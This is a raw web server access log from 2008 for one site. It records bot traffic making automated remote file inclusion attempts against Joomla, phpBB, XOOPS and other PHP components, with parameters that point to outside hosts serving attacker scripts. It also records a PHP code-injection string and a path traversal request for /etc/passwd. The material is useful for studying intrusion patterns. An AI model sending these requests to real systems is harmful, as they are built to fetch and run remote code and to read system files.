190.54.49.157 - - [06/May/2008:11:23:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
190.54.49.157 - - [06/May/2008:11:23:40 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 200 4139 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
200.195.11.193 - - [06/May/2008:11:23:47 -0700] "GET /logs/access_080228.log/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [06/May/2008:11:23:47 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [06/May/2008:11:23:48 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.35.191.113 - - [06/May/2008:11:23:59 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:23:59 -0700] "GET /protection.php?action=logout&siteurl=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.35.191.113 - - [06/May/2008:11:24:00 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:24:00 -0700] "GET /logs/protection.php?action=logout&siteurl=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.35.191.113 - - [06/May/2008:11:24:02 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
207.58.138.166 - - [06/May/2008:11:24:21 -0700] "GET /logs/access_080127.log/bemarket/postscript/postscript.php?p_mode=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [06/May/2008:11:24:21 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [06/May/2008:11:24:21 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:24:31 -0700] "GET /logs/access_080224.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.203.73.105 - - [06/May/2008:11:24:34 -0700] "GET /logs/access_071224.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.138.166 - - [06/May/2008:11:24:41 -0700] "GET /logs/access_080112.log/bemarket/postscript/postscript.php?p_mode=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.130.79.49 - - [06/May/2008:11:24:51 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [06/May/2008:11:24:51 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:25:05 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:25:05 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:25:06 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:25:20 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:25:21 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:11:25:22 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:25:22 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:11:25:22 -0700] "GET /index.php?side=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:11:25:22 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:11:25:23 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:25:25 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:25:25 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:25:41 -0700] "GET /logs/access_080321.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.228.200.67 - - [06/May/2008:11:25:53 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.228.200.67 - - [06/May/2008:11:25:53 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:26:06 -0700] "GET /logs/access_071211.log//db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:26:28 -0700] "GET /logs/access_080108.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
24.176.255.158 - - [06/May/2008:11:26:29 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [06/May/2008:11:26:29 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:26:38 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:26:43 -0700] "GET /index.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:11:26:53 -0700] "GET /logs/access_080121.log/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:27:01 -0700] "GET /logs/access_080315.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:27:01 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:27:01 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.26.29 - - [06/May/2008:11:27:06 -0700] "GET /logs/access_071113.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.203.73.105 - - [06/May/2008:11:27:38 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [06/May/2008:11:27:39 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [06/May/2008:11:27:40 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:27:48 -0700] "GET /logs/access_080121.log/components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:11:27:58 -0700] "GET /logs/access_080121.log/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:28:14 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:11:28:22 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:11:28:22 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:11:28:23 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:11:28:23 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.137.18 - - [06/May/2008:11:28:27 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.137.18 - - [06/May/2008:11:28:27 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:28:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:28:31 -0700] "GET //db.php?path_local=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:28:38 -0700] "GET /logs/access_080220.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.137.18 - - [06/May/2008:11:28:41 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:11:28:42 -0700] "GET //index2.php?option=com_quiz&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:11:28:42 -0700] "GET /logs//index2.php?option=com_quiz&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:28:43 -0700] "GET //oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:28:52 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:28:53 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:28:58 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:29:05 -0700] "GET /logs//eva/index.php3?aide=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:29:05 -0700] "GET //eva/index.php3?aide=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:29:20 -0700] "GET /logs/access_080114.log//myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:29:20 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:29:20 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:29:27 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:29:48 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:29:55 -0700] "GET /logs/access_080223.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:29:57 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:11:30:35 -0700] "GET /main.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.228.200.67 - - [06/May/2008:11:30:38 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:31:01 -0700] "GET /logs/access_080218.log/admin.php?page=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:31:01 -0700] "GET /admin.php?page=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:31:01 -0700] "GET /logs/admin.php?page=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.220.82 - - [06/May/2008:11:31:16 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [06/May/2008:11:31:17 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [06/May/2008:11:31:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:31:22 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:31:22 -0700] "GET //modules/xfsection/modify.php?dir_module=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:11:31:35 -0700] "GET /logs/access_080121.log/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:31:43 -0700] "GET /include/global.inc.php?l=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:31:43 -0700] "GET /logs/include/global.inc.php?l=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:31:54 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:32:16 -0700] "GET /es_desp.php?files_dir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:32:28 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:32:29 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:33:14 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:33:14 -0700] "GET //modules/xfsection/modify.php?dir_module=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:33:15 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:33:16 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:33:32 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:33:33 -0700] "GET /logs/access.log//display.php?page=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:33:33 -0700] "GET //display.php?page=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:33:34 -0700] "GET /logs//display.php?page=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:33:35 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:33:35 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:11:33:36 -0700] "GET /logs/access_080121.log/components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:33:46 -0700] "GET /logs/access_080218.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:33:49 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.220.82 - - [06/May/2008:11:34:04 -0700] "GET /logs/access_071219.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [06/May/2008:11:34:06 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:11:34:06 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:11:34:07 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.220.82 - - [06/May/2008:11:34:08 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
